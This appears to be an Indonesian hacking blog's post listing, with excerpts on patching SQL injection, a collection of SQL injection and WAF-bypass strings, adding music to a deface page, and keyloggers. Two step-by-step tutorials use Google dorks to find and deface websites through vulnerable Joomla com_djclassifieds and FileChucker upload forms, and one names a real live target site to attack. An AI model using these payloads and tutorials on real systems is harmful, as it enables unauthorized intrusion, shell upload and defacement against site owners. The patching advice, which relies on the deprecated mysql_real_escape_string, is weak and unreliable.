Postingan

Cara Menutup Bug SQL Injection

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring Kali Ini saya akan Membahas Tentang Bagaimana  CARA MENUTUP BUG SQL INJECTION Kali ini saya akan menggunakan easy method untuk menutup bug tersebut. Memberi filter pada karakter yang akan dimasukkan ke dalam query. Kita halau karakter seperti (-) terlebih dahulu. if ( $id_anu < 0) { echo "Patched." ; exit ; } Definisi logika: Jika nilai $id kurang dari 0, maka akan tampil "Patched." | Mencegah karakter (-). Memberi perintah is_numeric.  if (!is_numeric( $id_anu )) { echo "Patched." ; exit ; } Definisi logika: Jika nilai $id bukan golongan dari numeric atau angka, maka akan tampil "Patched." Memberi fungsi mysql_real_escape_string. mysql_real_escape_string adalah fungsi PHP yang digunakan untuk memberi backslash di beberapa kode untuk ditampilkan pada halaman, namun saat menyimpan menuju sql, kode
Posting Komentar
Baca selengkapnya

KUMPULAN STRING SQL-INJECTION

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring Kali ini gue mau share macam-macam String Sekaligus beberapa Bypass Waff dengan methode SQL-Injection manual Note : Semua String Bypass dibawah ini, Saya ambil dari berbagai sumber dan dirangkum menjadi satu (Youtube, Group SQL-I, Forum, DLL) [+] THIS IS STRING FOR EXECUTION WEBSITE VULN SQL-INJECTION [+] '--+ '+--+ ')-- ')--+ ')+--+ '))--+ [+] SEARCHING IN INJECT POINT [+] order+by group+by order/**/by order/**_**/by /*!42247order*//**//*!42247by*/ %0aorder%0aby%0a [+] UNION SELECT FOR NUMBER AT DATABASE [+] union+select union/**/select union/**_**/select . id=1.unioN/**/distinct%20%73eleCt""a id=1%.0unioN/**/distinct%20%73eleCt+-!~ id=1%""unioN/**/distinct%20%73eleCt@$% id=1%''unioN/**/distinct%20%73eleCt@%C0% cth : id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- - id=1%.0unioN/**/distin
Posting Komentar
Baca selengkapnya

Cara Memasukkan Lagu Pada SCRIPT DEFACE

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring ,  Ok, tanpa banyak bacot langsung saja simak berikut :v Cekidoooottt :v 1. Script deface tentunya. 2. Notepad / Notepad++ DOWNLOAD NOTEPAD++ VERSI TERBARU Langkah : 1. Copy script berikut : <iframe width="0" height="0" src="//www.youtube.com/embed/lqYQXIt4SpA?rel=0&autoplay=1&loop=1&playlist=60ItHLz5WEA" frameborder="0" allowfullscreen></iframe> 2. Perhatikan kode  lqYQXIt4SpA  dan  60ItHLz5WEA  itu merupakan kode lagu nya, jika ingin mengganti, cari kode lagu youtube yang kamu inginkan. Lalu, bagaimana cara mencari kode lagu yang diinginkan? Contohnya : https://www.youtube.com/watch?v= 60ItHLz5WEA  : Lagu Alan Walker - Faded Jadi  60ItHLz5WEA  merupakan kode untuk lagu alan walker - faded. 3. Masukkan kode lagu kedalam script diatas dan masukkan ke script deface. 4. Kemudian s
Posting Komentar
Baca selengkapnya

DEFACE Joomla com_djclassifieds UPSHELL

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi Bersama Saya RUTH72_ Kali Ini saya akan memberi Sedikit Turtorial  Ok Kita Langsung Ke Tutorial Nya aja ya hehe :v Bahan-bahan : Dork: inurl:=com_djclassifieds          ( Use your brain ) Exploit : index.php?option=com_djclassifieds&task=upload&tmpl=component Live Target : http://grupoposgar.es/ Csrf  type " file " >  DISINI :D Step by step : 1 . dorking menggukan dork dia atas , karena saya punya live target , ikutti saja step by step . 2 . jangan lupa masukkan exploit nya . http://grupoposgar.es/index.php?option=com_djclassifieds&task=upload&tmpl=component 3 . jika vlun ada tulisan , seperti gambar di bawah . Notice: Undefined variable: contentType in /homepages/41/d603710153/htdocs/Posgar_2/administrator/components/com_djclassifieds/lib/djupload.php on line 320 {"jsonrpc" : "2.0", "result" : null, "id" : "id"} 4 . gunakan csrf nya dan upload file .
Posting Komentar
Baca selengkapnya

DEFACE UPLOAD FILE WITH FILECHUCKER

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi Bersama Saya RUTH72_ Kali Ini saya akan memberi Sedikit Turtorial  Ok Kita Langsung Ke Tutorial Nya aja ya hehe :V Dork -> inurl:/cgi-bin/filechucker.cgi          intext:Toptown File Upload  inurl:/cgi-bin/filechucker.pl Step by step : 1 . dorking menggukan dork dia atas , karena saya punya live target , ikutti saja step by step . 2 . isi data , asal asalan juga boleh gan :) 3 . nanti ada tempat pilih file -> upload sc kalian  4 . jika berhasil maka gambar seperti ini   5 . tingall buka deh hasilnya Http://target.com/upload/files/namafile.html Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian Jangan Lupa Di Share ya :) #Hacking #AnarchoXploit  #NusantaraCode
Posting Komentar
Baca selengkapnya

KEYLOGGER : Pengertian, Kegunaan, Cara Kerja, dan Cara Mengatasinya

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya. Ok, tanpa banyak bacot langsung saja simak berikut :v Cekidoooottt :v PENGERTIAN :       Keylogger merupakan singkatan dari  Keystore Logger , yaitu sebuah perangkat yang digunakan untuk memantau penekanan tombol keyboard dan penyimpanannya. Keylogger juga terdapat dalam Software maupun Hardware.      Keylogger yang berupa Hardware bisanya dipasangkan pada ujung mouse sehingga dapat mencegat data yang dialirkan dari keyboard menuju ke CPU. Sementara itu, Keylogger yang berupa Software terpasang didalam komputer dan bekerja secara sembunyi.      Pada awal pembuatan Keylogger, Keylogger hanya digunakan untuk media perekam pengetikkan keyboard. Namun, sekarang fasilitas yang terdapat pada Keylogger sudah berkembang. Tidak hanya merekam pengetikkan pada keyboard
Posting Komentar
Baca selengkapnya